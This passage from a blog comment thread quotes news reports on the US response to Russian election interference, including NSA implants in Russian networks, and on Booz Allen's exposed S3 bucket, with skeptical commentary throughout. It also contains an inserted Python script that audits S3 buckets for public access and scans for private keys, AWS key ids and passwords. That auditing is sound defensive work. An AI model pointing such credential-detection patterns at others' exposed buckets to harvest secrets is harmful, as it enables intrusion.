    Russia experts had begun to see a troubling pattern of propaganda in which fictitious news stories, assumed to be generated by Moscow, proliferated across social-media platforms.

    Officials at the State Department and FBI became alarmed by an unusual spike in requests from Russia for temporary visas for officials with technical skills seeking permission to enter the United States for short-term assignments at Russian facilities. At the FBI’s behest, the State Department delayed approving the visas until after the election.

    Meanwhile, the FBI was tracking a flurry of hacking activity against U.S. political parties, think tanks and other targets. Russia had gained entry to DNC systems in the summer of 2015 and spring of 2016, but the breaches did not become public until they were disclosed in a June 2016 report by The Post.

    Even after the late-July WikiLeaks dump, which came on the eve of the Democratic convention and led to the resignation of Rep. Debbie Wasserman Schultz (D-Fla.) as the DNC’s chairwoman, U.S. intelligence officials continued to express uncertainty about who was behind the hacks or why they were carried out.

    At a public security conference in Aspen, Colo., in late July, Director of National Intelligence James R. Clapper Jr. noted that Russia had a long history of meddling in American elections but that U.S. spy agencies were not ready to “make the call on attribution” for what was happening in 2016.

    “We don’t know enough … to ascribe motivation,” Clapper said. “Was this just to stir up trouble or was this ultimately to try to influence an election?”

    Brennan convened a secret task force at CIA headquarters composed of several dozen analysts and officers from the CIA, the NSA and the FBI.

    The unit functioned as a sealed compartment, its work hidden from the rest of the intelligence community. Those brought in signed new non-disclosure agreements to be granted access to intelligence from all three participating agencies.

    They worked exclusively for two groups of “customers,” officials said. The first was Obama and fewer than 14 senior officials in government. The second was a team of operations specialists at the CIA, NSA and FBI who took direction from the task force on where to aim their subsequent efforts to collect more intelligence on Russia.

    Don’t make things worse

    The secrecy extended into the White House.

    Rice, Haines and White House homeland-security adviser Lisa Monaco convened meetings in the Situation Room to weigh the mounting evidence of Russian interference and generate options for how to respond. At first, only four senior security officials were allowed to attend: Brennan, Clapper, Attorney General Loretta E. Lynch and FBI Director James B. Comey. Aides ordinarily allowed entry as “plus-ones” were barred.

    Gradually, the circle widened to include Vice President Biden and others. Agendas sent to Cabinet secretaries — including John F. Kerry at the State Department and Ashton B. Carter at the Pentagon — arrived in envelopes that subordinates were not supposed to open. Sometimes the agendas were withheld until participants had taken their seats in the Situation Room.

    Throughout his presidency, Obama’s approach to national security challenges was deliberate and cautious. He came into office seeking to end wars in Iraq and Afghanistan. He was loath to act without support from allies overseas and firm political footing at home. He was drawn only reluctantly into foreign crises, such as the civil war in Syria, that presented no clear exit for the United States.

    Obama’s approach often seemed reducible to a single imperative: Don’t make things worse. As brazen as the Russian attacks on the election seemed, Obama and his top advisers feared that things could get far worse.

    They were concerned that any pre-election response could provoke an escalation from Putin. Moscow’s meddling to that point was seen as deeply concerning but unlikely to materially affect the outcome of the election. Far more worrisome to the Obama team was the prospect of a cyber-assault on voting systems before and on Election Day.

    They also worried that any action they took would be perceived as political interference in an already volatile campaign. By August, Trump was predicting that the election would be rigged. Obama officials feared providing fuel to such claims, playing into Russia’s efforts to discredit the outcome and potentially contaminating the expected Clinton triumph.

    Before departing for an August vacation to Martha’s Vineyard, Obama instructed aides to pursue ways to deter Moscow and proceed along three main paths: Get a high-confidence assessment from U.S. intelligence agencies on Russia’s role and intent; shore up any vulnerabilities in state-run election systems; and seek bipartisan support from congressional leaders for a statement condemning Moscow and urging states to accept federal help.

    The administration encountered obstacles at every turn.

    Despite the intelligence the CIA had produced, other agencies were slower to endorse a conclusion that Putin was personally directing the operation and wanted to help Trump. “It was definitely compelling, but it was not definitive,” said one senior administration official. “We needed more.”

    Some of the most critical technical intelligence on Russia came from another country, officials said. Because of the source of the material, the NSA was reluctant to view it with high confidence.

    Brennan moved swiftly to schedule private briefings with congressional leaders. But getting appointments with certain Republicans proved difficult, officials said, and it was not until after Labor Day that Brennan had reached all members of the “Gang of Eight” — the majority and minority leaders of both houses and the chairmen and ranking Democrats on the Senate and House intelligence committees.

    Jeh Johnson, the homeland-security secretary, was responsible for finding out whether the government could quickly shore up the security of the nation’s archaic patchwork of voting systems. He floated the idea of designating state mechanisms “critical infrastructure,” a label that would have entitled states to receive priority in federal cybersecurity assistance, putting them on a par with U.S. defense contractors and financial networks.

    On Aug. 15, Johnson arranged a conference call with dozens of state officials, hoping to enlist their support. He ran into a wall of resistance.

    The reaction “ranged from neutral to negative,” Johnson said in congressional testimony Wednesday.

    Brian Kemp, the Republican secretary of state of Georgia, used the call to denounce Johnson’s proposal as an assault on state rights. “I think it was a politically calculated move by the previous administration,” Kemp said in a recent interview, adding that he remains unconvinced that Russia waged a campaign to disrupt the 2016 race. “I don’t necessarily believe that,” he said.

    Stung by the reaction, the White House turned to Congress for help, hoping that a bipartisan appeal to states would be more effective.

    In early September, Johnson, Comey and Monaco arrived on Capitol Hill in a caravan of black SUVs for a meeting with 12 key members of Congress, including the leadership of both parties.

    The meeting devolved into a partisan squabble.

    “The Dems were, ‘Hey, we have to tell the public,’” recalled one participant. But Republicans resisted, arguing that to warn the public that the election was under attack would further Russia’s aim of sapping confidence in the system.

    Senate Majority Leader Mitch McConnell (R-Ky.) went further, officials said, voicing skepticism that the underlying intelligence truly supported the White House’s claims. Through a spokeswoman, McConnell declined to comment, citing the secrecy of that meeting.

    Key Democrats were stunned by the GOP response and exasperated that the White House seemed willing to let Republican opposition block any pre-election move.

    On Sept. 22, two California Democrats — Sen. Dianne Feinstein and Rep. Adam B. Schiff — did what they couldn’t get the White House to do. They issued a statement making clear that they had learned from intelligence briefings that Russia was directing a campaign to undermine the election, but they stopped short of saying to what end.

    A week later, McConnell and other congressional leaders issued a cautious statement that encouraged state election officials to ensure their networks were “secure from attack.” The release made no mention of Russia and emphasized that the lawmakers “would oppose any effort by the federal government” to encroach on the states’ authorities.

    When U.S. spy agencies reached unanimous agreement in late September that the interference was a Russian operation directed by Putin, Obama directed spy chiefs to prepare a public statement summarizing the intelligence in broad strokes.

    With Obama still determined to avoid any appearance of politics, the statement would not carry his signature.

    On Oct. 7, the administration offered its first public comment on Russia’s “active measures,” in a three-paragraph statement issued by Johnson and Clapper. Comey had initially agreed to attach his name, as well, officials said, but changed his mind at the last minute, saying that it was too close to the election for the bureau to be involved.

    “The U.S. intelligence community is confident that the Russian government directed the recent compromises of e-mails from U.S. persons and institutions, including from U.S. political organizations,” the statement said. “We believe, based on the scope and sensitivity of these efforts, that only Russia’s senior-most officials could have authorized these activities.”

    Early drafts accused Putin by name, but the reference was removed out of concern that it might endanger intelligence sources and methods.

    The statement was issued around 3:30 p.m., timed for maximum media coverage. Instead, it was quickly drowned out. At 4 p.m., The Post published a story about crude comments Trump had made about women that were captured on an “Access Hollywood” tape. Half an hour later, WikiLeaks published its first batch of emails stolen from Clinton campaign chairman John Podesta.

    ‘Ample time’ after election

    The Situation Room is actually a complex of secure spaces in the basement level of the West Wing. A video feed from the main room courses through some National Security Council offices, allowing senior aides sitting at their desks to see — but not hear — when meetings are underway.

    As the Russia-related sessions with Cabinet members began in August, the video feed was shut off. The last time that had happened on a sustained basis, officials said, was in the spring of 2011 during the run-up to the U.S. Special Operations raid on bin Laden’s compound in Pakistan.

    The blacked-out screens were seen as an ominous sign among lower-level White House officials who were largely kept in the dark about the Russia deliberations even as they were tasked with generating options for retaliation against Moscow.

    Much of that work was led by the Cyber Response Group, an NSC unit with representatives from the CIA, NSA, State Department and Pentagon.

    The early options they discussed were ambitious. They looked at sectorwide economic sanctions and cyberattacks that would take Russian networks temporarily offline. One official informally suggested — though never formally proposed — moving a U.S. naval carrier group into the Baltic Sea as a symbol of resolve.

    What those lower-level officials did not know was that the principals and their deputies had by late September all but ruled out any pre-election retaliation against Moscow. They feared that any action would be seen as political and that Putin, motivated by a seething resentment of Clinton, was prepared to go beyond fake news and email dumps.

    The FBI had detected suspected Russian attempts to penetrate election systems in 21 states, and at least one senior White House official assumed that Moscow would try all 50, officials said. Some officials believed the attempts were meant to be detected to unnerve the Americans. The patchwork nature of the United States’ 3,000 or so voting jurisdictions would make it hard for Russia to swing the outcome, but Moscow could still sow chaos.

    “We turned to other scenarios” the Russians might attempt, said Michael Daniel, who was cybersecurity coordinator at the White House, “such as disrupting the voter rolls, deleting every 10th voter [from registries] or flipping two digits in everybody’s address.”

    The White House also worried that they had not yet seen the worst of Russia’s campaign. WikiLeaks and DCLeaks, a website set up in June 2016 by hackers believed to be Russian operatives, already had troves of emails. But U.S. officials feared that Russia had more explosive material or was willing to fabricate it.

    “Our primary interest in August, September and October was to prevent them from doing the max they could do,” said a senior administration official. “We made the judgment that we had ample time after the election, regardless of outcome, for punitive measures.”

    The assumption that Clinton would win contributed to the lack of urgency.

    Instead, the administration issued a series of warnings.

    Brennan delivered the first on Aug. 4 in a blunt phone call with Alexander Bortnikov, the director of the FSB, Russia’s powerful security service.

    A month later, Obama confronted Putin directly during a meeting of world leaders in Hangzhou, China. Accompanied only by interpreters, Obama told Putin that “we knew what he was doing and [he] better stop or else,” according to a senior aide who subsequently spoke with Obama. Putin responded by demanding proof and accusing the United States of interfering in Russia’s internal affairs.

    In a subsequent news conference, Obama alluded to the exchange and issued a veiled threat. “We’re moving into a new era here where a number of countries have significant capacities,” he said. “Frankly, we’ve got more capacity than anybody both offensively and defensively.”

    There were at least two other warnings.

    On Oct. 7, the day that the Clapper-Johnson statement was released, Rice summoned Russian Ambassador Sergey Kislyak to the White House and handed him a message to relay to Putin.

    Then, on Oct. 31, the administration delivered a final pre-election message via a secure channel to Moscow originally created to avert a nuclear exchange. The message noted that the United States had detected malicious activity, originating from servers in Russia, targeting U.S. election systems and warned that meddling would be regarded as unacceptable interference. Russia confirmed the next day that it had received the message but replied only after the election through the same channel, denying the accusation.

    As Election Day approached, proponents of taking action against Russia made final, futile appeals to Obama’s top aides: McDonough, Rice and Haines. Because their offices were part of a suite of spaces in the West Wing, securing their support on any national security issue came to be known as “moving the suite.”

    One of the last to try before the election was Kerry. Often perceived as reluctant to confront Russia, in part to preserve his attempts to negotiate a Syria peace deal, Kerry was at critical moments one of the leading hawks.

    In October, Kerry’s top aides had produced an “action memo” that included a package of retaliatory measures including economic sanctions. Knowing the White House was not willing to act before the election, the plan called for the measures to be announced almost immediately after votes had been securely cast and counted.

    Kerry signed the memo and urged the White House to convene a principals meeting to discuss the plan, officials said. “The response was basically, ‘Not now,’” one official said.

    Election Day arrived without penalty for Moscow.

    A U.S. cyber-weapon

    The most difficult measure to evaluate is one that Obama alluded to in only the most oblique fashion when announcing the U.S. response.

    “We will continue to take a variety of actions at a time and place of our choosing, some of which will not be publicized,” he said in a statement released by the White House.

    He was referring, in part, to a cyber operation that was designed to be detected by Moscow but not cause significant damage, officials said. The operation, which entailed implanting computer code in sensitive computer systems that Russia was bound to find, served only as a reminder to Moscow of the United States’ cyber reach.

    But Obama also signed the secret finding, officials said, authorizing a new covert program involving the NSA, CIA and U.S. Cyber Command.

    Obama declined to comment for this article, but a spokesman issued a statement: “This situation was taken extremely seriously, as is evident by President Obama raising this issue directly with President Putin; 17 intelligence agencies issuing an extraordinary public statement; our homeland security officials working relentlessly to bolster the cyber defenses of voting infrastructure around the country; the President directing a comprehensive intelligence review, and ultimately issuing a robust response including shutting down two Russian compounds, sanctioning nine Russian entities and individuals, and ejecting 35 Russian diplomats from the country.”

    The cyber operation is still in its early stages and involves deploying “implants” in Russian networks deemed “important to the adversary and that would cause them pain and discomfort if they were disrupted,” a former U.S. official said.

    The implants were developed by the NSA and designed so that they could be triggered remotely as part of retaliatory cyber-strike in the face of Russian aggression, whether an attack on a power grid or interference in a future presidential race.

    Officials familiar with the measures said that there was concern among some in the administration that the damage caused by the implants could be difficult to contain.

    As a result, the administration requested a legal review, which concluded that the devices could be controlled well enough that their deployment would be considered “proportional” in varying scenarios of Russian provocation, a requirement under international law.

    The operation was described as long-term, taking months to position the implants and requiring maintenance thereafter. Under the rules of covert action, Obama’s signature was all that was necessary to set the operation in motion.

    U.S. intelligence agencies do not need further approval from Trump, and officials said that he would have to issue a countermanding order to stop it. The officials said that they have seen no indication that Trump has done so.

    ———-

    “Obama’s secret struggle to punish Russia for Putin’s election assault” by Greg Miller, Ellen Nakashima and Adam Entous; The Washington Post; 06/23/2017

    “Inside was an intelligence bombshell, a report drawn from sourcing deep inside the Russian government that detailed Russian President Vladimir Putin’s direct involvement in a cyber campaign to disrupt and discredit the U.S. presidential race.”

    So a CIA deep Russian government source is the primary source of the ‘Putin ordered it’ conclusion. Well, at least that’s better than the bad joke technical evidence that’s been provided thus far. But even that source’s claims apparently weren’t enough to convince other parts of the intelligence community. It took the intelligence from the unnamed ally to do that:


    But it went further. The intelligence captured Putin’s specific instructions on the operation’s audacious objectives — defeat or at least damage the Democratic nominee, Hillary Clinton, and help elect her opponent, Donald Trump.

    At that point, the outlines of the Russian assault on the U.S. election were increasingly apparent. Hackers with ties to Russian intelligence services had been rummaging through Democratic Party computer networks, as well as some Republican systems, for more than a year. In July, the FBI had opened an investigation of contacts between Russian officials and Trump associates. And on July 22, nearly 20,000 emails stolen from the Democratic National Committee were dumped online by WikiLeaks.

    But at the highest levels of government, among those responsible for managing the crisis, the first moment of true foreboding about Russia’s intentions arrived with that CIA intelligence.

    It took time for other parts of the intelligence community to endorse the CIA’s view. Only in the administration’s final weeks in office did it tell the public, in a declassified report, what officials had learned from Brennan in August — that Putin was working to elect Trump.

    Despite the intelligence the CIA had produced, other agencies were slower to endorse a conclusion that Putin was personally directing the operation and wanted to help Trump. “It was definitely compelling, but it was not definitive,” said one senior administration official. “We needed more.”

    Some of the most critical technical intelligence on Russia came from another country, officials said. Because of the source of the material, the NSA was reluctant to view it with high confidence.

    “Some of the most critical technical intelligence on Russia came from another country, officials said. Because of the source of the material, the NSA was reluctant to view it with high confidence.”

    That sure sounds like a ‘slam dunk’ case. And not the good kind. And based on these intelligence sources, the US is openly planting retaliatory cyberbombs on Russian networks:


    But Obama also signed the secret finding, officials said, authorizing a new covert program involving the NSA, CIA and U.S. Cyber Command.

    The cyber operation is still in its early stages and involves deploying “implants” in Russian networks deemed “important to the adversary and that would cause them pain and discomfort if they were disrupted,” a former U.S. official said.

    The implants were developed by the NSA and designed so that they could be triggered remotely as part of retaliatory cyber-strike in the face of Russian aggression, whether an attack on a power grid or interference in a future presidential race.

    Officials familiar with the measures said that there was concern among some in the administration that the damage caused by the implants could be difficult to contain.

    As a result, the administration requested a legal review, which concluded that the devices could be controlled well enough that their deployment would be considered “proportional” in varying scenarios of Russian provocation, a requirement under international law.

    The operation was described as long-term, taking months to position the implants and requiring maintenance thereafter. Under the rules of covert action, Obama’s signature was all that was necessary to set the operation in motion.

    U.S. intelligence agencies do not need further approval from Trump, and officials said that he would have to issue a countermanding order to stop it. The officials said that they have seen no indication that Trump has done so.

    Keep in mind that such a response from the US would be entirely predictable if the Russian government really did order this hack attack. Russia would be at a heightened risk for years or decades to come if Putin really did order this attack and there’s no reason to assume that the Russian government wouldn’t be well aware of this consequence. So if Putin really did order this hack he would have to have gone insane. That’s how stupid this attack was if Putin actually ordered it. But according to a CIA spy in the Kremlin, along with a questionable foreign ally, that’s exactly what Putin did. Because he apparently went insane and preemptively launched a cyberwar knowing full well how devastating the long-term consequences could be. Because he really, really, really hates Hillary. That’s the narrative we’re being given.

    And now, any future attacks on US elections or the US electrical grid that can somehow be pinned on the Russians is going to trigger some sort of painful wave of retaliatory cyberbombs. Which, of course, will likely trigger a wave of counter-retaliatory cyberbombs in the US. And a full-scale cyberwar will be born and we’ll just have to hope it stays in the cyber domain. That’s where we are now based on a CIA spy in the Kremlin and an unnamed foreign intelligence agency.

    Posted by Pterrafractyl | June 23, 2017, 2:48 pm
  12. Here’s a pair of stories that are only tangentially related to the high profile 2016 DNC hacks and are really more a prelude to some yet-to-happen hacks of sensitive government. It’s also exciting news for people who like to routinely scan the Amazon Cloud searching for servers left accidentally vulnerable to the public: The Amazon Cloud is joining IBM and Microsoft as one of three private companies available for hosting the US Department of Defense’s most sensitive unclassified data:

    NextGov

    Amazon Web Services Can Now Host the Defense Department’s Most Sensitive Data

    By Frank Konkel
    September 13, 2017

    Amazon Web Services has a new market for its cloud computing, analytics, and storage services.

    This week, the Defense Department granted the cloud computing giant a provisional authorization to host Impact Level 5 workloads, which are the military and Pentagon’s most sensitive, unclassified information.

    “This further bolsters AWS as an industry leader in helping support the DoD’s critical mission in protecting our security,” the company said in a statement. “The AWS services support a variety of DoD workloads, including workloads containing sensitive controlled unclassified information and National Security Systems information.”

    Already, DoD is using AWS to host sensitive, mission-critical workloads, including the operational control system for the Global Positioning System. The provisional authorization allows military customers an easier route to use AWS for a variety of other IT services.

    In total, three commercial companies—AWS, IBM and Microsoft—are now able to host and store the military’s most sensitive unclassified data. AWS has expanded its defense business, it remains the dominant cloud service provider in the intelligence community by virtue of its $600 million contract with the Central Intelligence Agency. AWS’ C2S cloud hosts classified information for the 17 intelligence agencies.

    ———-

    “Amazon Web Services Can Now Host the Defense Department’s Most Sensitive Data” by Frank Konkel; NextGov; 09/13/2017

    “In total, three commercial companies—AWS, IBM and Microsoft—are now able to host and store the military’s most sensitive unclassified data. AWS has expanded its defense business, it remains the dominant cloud service provider in the intelligence community by virtue of its $600 million contract with the Central Intelligence Agency. AWS’ C2S cloud hosts classified information for the 17 intelligence agencies.”

    Yep, Amazon Web Services (AWS) is already hosting classified information for 17 US intelligence agencies, led by a $600 million contract with the CIA. A contract that involved Amazon developing a completely separate cloud infrastructure with extra layers of security, including being completely separate from the rest of the internet and extra encryption.

    But it sounds like this recent rule change that allows for unclassified, but still highly sensitive, data doesn’t involve that separate extra secure cloud. It’s just the regular Amazon AWS. What could possibly go wrong? Well, here’s a story from back in May starring Booz Allen Hamilton (Edward Snowden’s brief employer) that’s a pretty good example of what could go wrong:

    Gizmodo

    Top Defense Contractor Left Sensitive Pentagon Files on Amazon Server With No Password [Updated]

    Dell Cameron
    5/31/17 9:40am

    Sensitive files tied to a US military project were leaked by a multi-billion dollar firm once described as the world’s most profitable spy operation, Gizmodo has confirmed.

    A cache of more than 60,000 files was discovered last week on a publicly accessible Amazon server, including passwords to a US government system containing sensitive information, and the security credentials of a lead senior engineer at Booz Allen Hamilton, one of the nation’s top intelligence and defense contractors. What’s more, the roughly 28GB of data contained at least a half dozen unencrypted passwords belonging to government contractors with Top Secret Facility Clearance.

    The exposed credentials could potentially grant their holders further access to repositories housing similarly sensitive government data.

    Countless references are made in the leaked files to the US National Geospatial-Intelligence Agency (NGA), which in March awarded Booz Allen an $86 million defense contract. Often referred to as the Pentagon’s “mapmakers,” the combat support agency works alongside the Central Intelligence Agency, the National Reconnaissance Office, and the Defense Intelligence Agency to collect and analyze geospatial data gathered by spy satellites and aerial drones.

    The NGA on Tuesday confirmed the leak to Gizmodo while stressing that no classified information had been disclosed. “NGA takes the potential disclosure of sensitive but unclassified information seriously and immediately revoked the affected credentials,” an agency spokesperson said. The Amazon server from which the data was leaked was “not directly connected to classified networks,” the spokesperson noted.

    UpGuard cyber risk analyst Chris Vickery discovered the Booz Allen server last week while at his Santa Rosa home running a scan for publicly accessible s3 buckets (what Amazon calls its cloud storage devices). At first there was no reason to suspect it contained sensitive military data. Typically, US government servers hosted by Amazon are segregated into what’s called the GovCloud—a “gated community” protected by advanced cryptography and physical security. Instead, the Booz Allen bucket was found in region “US-East-1,” chiefly comprised of public and commercial data.

    Yet the files bore some hallmarks of a government project. First, Vickery spotted the public and private SSH keys of a Booz Allen employee, identified by his LinkedIn page as a lead senior engineer in Virginia—also home to the NGA’s Fort Belvoir campus. “Exposing a private key belonging to a Booz Allen IT engineer is potentially catastrophic for malicious intrusion possibilities,” he said.

    SSH keys employ what’s called public-key cryptography and challenge-response authentication. Essentially, Booz Allen stores sensitive data in the cloud, and before the engineer can access it, his private key must pair successfully with a public key on Booz Allen’s server. This protocol only really works, however, so long as the employee’s private key remains a secret.

    “Booz Allen takes any allegation of a data breach very seriously, and promptly began an investigation into the accessibility of certain security keys in a cloud environment,” a Booz Allen spokesman told Gizmodo on Tuesday. “We secured those keys, and are continuing with a detailed forensic investigation. As of now, we have found no evidence that any classified information has been compromised as a result of this matter.”

    Mark Zaid, a Washington lawyer who specializes in national security cases, said the incident is likely to dredge up bad memories of the company. “The first thing that jumps to mind,” he said, is “Oh, no. It’s Booz Allen again.”

    Zaid was referring to Edward Snowden, the former NSA contractor who worked for Booz Allen when he fled to Hong Kong in 2013 with a trove of classified material. Another of the firm’s employees, Harold Martin III, was arrested last year and charged under the Espionage Act after federal agents discovered over 50 terabytes of classified data in his residence, the trunk of his car and in an unlocked outdoor shed.

    “Obviously, Booz Allen is a large company and a well-respected defense contractor,” Zaid added. “And none of these cases are necessarily related to one another. But it still raises some real serious concerns about what’s going on with Booz Allen’s security protocols.”

    In addition to keys, the Booz Allen server contained master credentials to a datacenter operating system—and others used to access the GEOAxIS authentication portal, a protected Pentagon system that usually requires an ID card and special computer to use. Yet another file contained the login credentials of a separate Amazon bucket, the contents of which remain a mystery; there’s no way to verify the contents legally since the bucket is secured by a password, and thus not open to the public.

    Moreover, a categorization script found in one of the Booz Allen files indicates the system under construction is at least designed to handle classified information. And while Vickery didn’t realize its significance at the time, the leaked files also appear connected to a third server he found open last month.

    In April, he discovered an Amazon bucket with no password containing a review of what he now believes is the same NGA system. An “application security risk assessment,” carried out using HP software called Fortify, detailed 3039 issues within the program’s source code (only 7 were described as critical). “I’m reading the report,” he says, “and the code snippets line up with code from the second bucket.”

    The mission of UpGuard’s Cyber Risk Team is to locate and secure leaked sensitive records, so Vickery’s first email on Wednesday was to Joe Mahaffee, Booz Allen’s chief information security officer. But after receiving no immediate response, he went directly to the agency. “I emailed the NGA at 10:33am on Thursday. Public access to the leak was cut off nine minutes later,” he said.

    “You can have fantastic cybersecurity, but if you’re using IT systems to share information with a partner whose cybersecurity isn’t up to snuff, then your protection measures don’t mean very much,” says Paulo Shakarian, a cybersecurity fellow at the Washington think-tank New America. The big unresolved question, he says, is whether Booz Allen had proper security protocols in place for its contractors working on the NGA project. “And likewise, what has NGA done to ensure that the proper protective measures were in place.”

    NGA informed Gizmodo that it was still evaluating the incident and had yet to determine a proper course of action. “It’s important to note that a misconfiguration, properly reported and addressed, does not disqualify industry partners from doing business with NGA,” the agency said, adding that it reserves the right to “address any violations or patterns of non-compliance appropriately.”

    Update: June 1st, 6:04pm ET: Booz Allen Hamilton sent Gizmodo the following statement:

    Both our client and Booz Allen have confirmed that no classified data was available on the impacted unclassified cloud environments. And we have confirmed that none of those usernames and passwords could have been used to access classified information. This appears to be a case in which an employee unintentionally left a key within an unclassified cloud environment where multiple users can develop software in an open environment. As soon as we learned of this mistake, we took action to secure the areas and alerted our client and began an investigation. Again, the important point here is that the affected cloud areas were not designed to contain any classified information. Our client has said they’ve found no evidence that classified data was involved, and so far our forensics have indicated the same. While any incident of this nature is unacceptable and we hope to learn from it, so far we see this event as having limited impact.

    ———-

    “Top Defense Contractor Left Sensitive Pentagon Files on Amazon Server With No Password [Updated]” by Dell Cameron; Gizmodo; 05/31/17

    “UpGuard cyber risk analyst Chris Vickery discovered the Booz Allen server last week while at his Santa Rosa home running a scan for publicly accessible s3 buckets (what Amazon calls its cloud storage devices). At first there was no reason to suspect it contained sensitive military data. Typically, US government servers hosted by Amazon are segregated into what’s called the GovCloud—a “gated community” protected by advanced cryptography and physical security. Instead, the Booz Allen bucket was found in region “US-East-1,” chiefly comprised of public and commercial data.”

    Fun times ahead for all the people who routinely scan publicly accessible AWS “buckets” for vulnerabilities. You just might stumble upon unprotected files from the US National Geospatial-Intelligence Agency (NGA). Or maybe you’ll find a bunch of passwords and private SSH keys that will allow you to break into other sensitive systems:


    Yet the files bore some hallmarks of a government project. First, Vickery spotted the public and private SSH keys of a Booz Allen employee, identified by his LinkedIn page as a lead senior engineer in Virginia—also home to the NGA’s Fort Belvoir campus. “Exposing a private key belonging to a Booz Allen IT engineer is potentially catastrophic for malicious intrusion possibilities,” he said.

    SSH keys employ what’s called public-key cryptography and challenge-response authentication. Essentially, Booz Allen stores sensitive data in the cloud, and before the engineer can access it, his private key must pair successfully with a public key on Booz Allen’s server. This protocol only really works, however, so long as the employee’s private key remains a secret.

    And maybe you’ll even find files associated with a vulnerable “bucket” you discovered months earlier:


    Moreover, a categorization script found in one of the Booz Allen files indicates the system under construction is at least designed to handle classified information. And while Vickery didn’t realize its significance at the time, the leaked files also appear connected to a third server he found open last month.

    In April, he discovered an Amazon bucket with no password containing a review of what he now believes is the same NGA system. An “application security risk assessment,” carried out using HP software called Fortify, detailed 3039 issues within the program’s source code (only 7 were described as critical). “I’m reading the report,” he says, “and the code snippets line up with code from the second bucket.”

    Yes, this same security analyst discovered an Amazon bucket months earlier with no password containing an “application security risk assessment” revealing software vulnerabilities. And the analyst is pretty sure that the application security risk assessment was an assessment for the same system that was being developed on the vulnerable bucket he discovered back in May. And it appears to be a system designed to handle classified information.

    So while this publicly available Amazon bucket didn’t contain classified information, it did appear to be the development environment for a system designed to handle classified information. And that’s a story from months before the DoD granted Amazon a provisional authorization to host Impact Level 5 workloads, the military and Pentagon’s most sensitive, unclassified information, on its cloud.

    And that all means we should get ready for lots of fun future stories about how a bunch of sensitive data was stolen off a publicly accessible Amazon web server used by a national security contractor followed up with a bunch of assurances that no one should worry because it was just unclassified data that was stolen.

    Posted by Pterrafractyl | September 19, 2017, 2:53 pm
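    The two failure modes in the Booz Allen story are a bucket that is readable by anyone and credential material (SSH private keys, passwords, access key ids) sitting inside it. The following is an added example, not code from the Gizmodo article, UpGuard or Booz Allen, of how an account owner can audit their own buckets offline for both conditions. The ACL and policy structures mirror the shapes the S3 API returns (`get-bucket-acl`, `get-bucket-policy`); the bucket name, object keys, key material and credentials are constructed placeholders (the access key id `AKIAIOSFODNN7EXAMPLE` is the example value from AWS documentation), and fetching real ACLs, policies and objects is assumed to happen outside this code.

```python
import json
import re

# S3 canned group URIs that make a grant world-readable or readable by any AWS user.
PUBLIC_GRANTEES = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}

# Patterns for credential material that should never sit in a shared bucket.
SECRET_PATTERNS = {
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"),
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "password_assignment": re.compile(r"(?i)\b(?:password|passwd|pwd)\s*[=:]\s*\S+"),
}


def acl_is_public(acl):
    """True if any ACL grant targets the AllUsers or AuthenticatedUsers group.
    The dict shape mirrors the get-bucket-acl response (assumption)."""
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GRANTEES:
            return True
    return False


def policy_is_public(policy_json):
    """True if an Allow statement in the bucket policy uses a wildcard principal."""
    if not policy_json:
        return False
    for stmt in json.loads(policy_json).get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        principal = stmt.get("Principal")
        aws = principal.get("AWS") if isinstance(principal, dict) else principal
        if aws == "*" or (isinstance(aws, list) and "*" in aws):
            return True
    return False


def find_secrets(objects):
    """objects maps object key -> contents (str or bytes).
    Returns (key, finding_type) pairs, one per pattern that matches."""
    findings = []
    for key, body in objects.items():
        text = body.decode("utf-8", "replace") if isinstance(body, bytes) else body
        for name, pattern in SECRET_PATTERNS.items():
            if pattern.search(text):
                findings.append((key, name))
    return findings


def audit_bucket(name, acl, policy_json, objects):
    """Combine the checks: exposure is critical when the bucket is reachable
    by anyone AND holds credential material."""
    report = {
        "bucket": name,
        "public_acl": acl_is_public(acl),
        "public_policy": policy_is_public(policy_json),
        "secrets": find_secrets(objects),
    }
    report["exposed_secrets"] = (
        (report["public_acl"] or report["public_policy"]) and bool(report["secrets"])
    )
    return report


# --- constructed sample input; none of this is a real key or credential ---
OWNER_GRANT = {"Grantee": {"Type": "CanonicalUser", "ID": "owner-id-placeholder"},
               "Permission": "FULL_CONTROL"}
SAMPLE_ACL = {"Owner": {"ID": "owner-id-placeholder"}, "Grants": [
    OWNER_GRANT,
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
     "Permission": "READ"},
]}
PRIVATE_ACL = {"Owner": {"ID": "owner-id-placeholder"}, "Grants": [OWNER_GRANT]}
SAMPLE_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
     "Resource": "arn:aws:s3:::example-dev-bucket/*"}]})
SAMPLE_OBJECTS = {
    "deploy/id_rsa": "-----BEGIN OPENSSH PRIVATE KEY-----\nPLACEHOLDER-NOT-A-REAL-KEY\n"
                     "-----END OPENSSH PRIVATE KEY-----\n",
    "config/app.properties": b"db.user=svc_app\ndb.password=placeholder-secret\n",
    "scripts/sync.sh": "export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n",
    "README.md": "Build notes for the dev environment.\n",
}

if __name__ == "__main__":
    print(json.dumps(audit_bucket("example-dev-bucket", SAMPLE_ACL,
                                  SAMPLE_POLICY, SAMPLE_OBJECTS), indent=2))
```

    The ACL and policy checks cover the two ways a bucket becomes public independently of each other, which is why the audit evaluates both rather than stopping at the first. The secret patterns are deliberately narrow (a PEM private-key header, the `AKIA` access key id prefix, a password assignment) so that a hit is worth a human look; a real deployment would add the account-level Block Public Access setting as a third check.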
  13. Here’s a pair of stories that, at best, are a reminder of the potential for algorithms and AI systems to acquire the hate and bigotry of their human creators. And, at worst, are a reminder that the potential for algorithms and AI systems to acquire the hate and bigotry of their human creators might be a great excuse for companies like Facebook to push a far-right agenda and just go “oops!” when they get caught.

    The second article is also a reminder of what we witnessed following the hack of the French election: that the US and Europe remain dangerously hyperfocused on the potential for Russian election meddling to the exclusion of almost any other force on the world stage (like the far-right movements that exist in every country on the planet and clearly want to meddle in elections).

    But first, check out the advertising categories Facebook’s algorithms auto-generated:

    Propublica

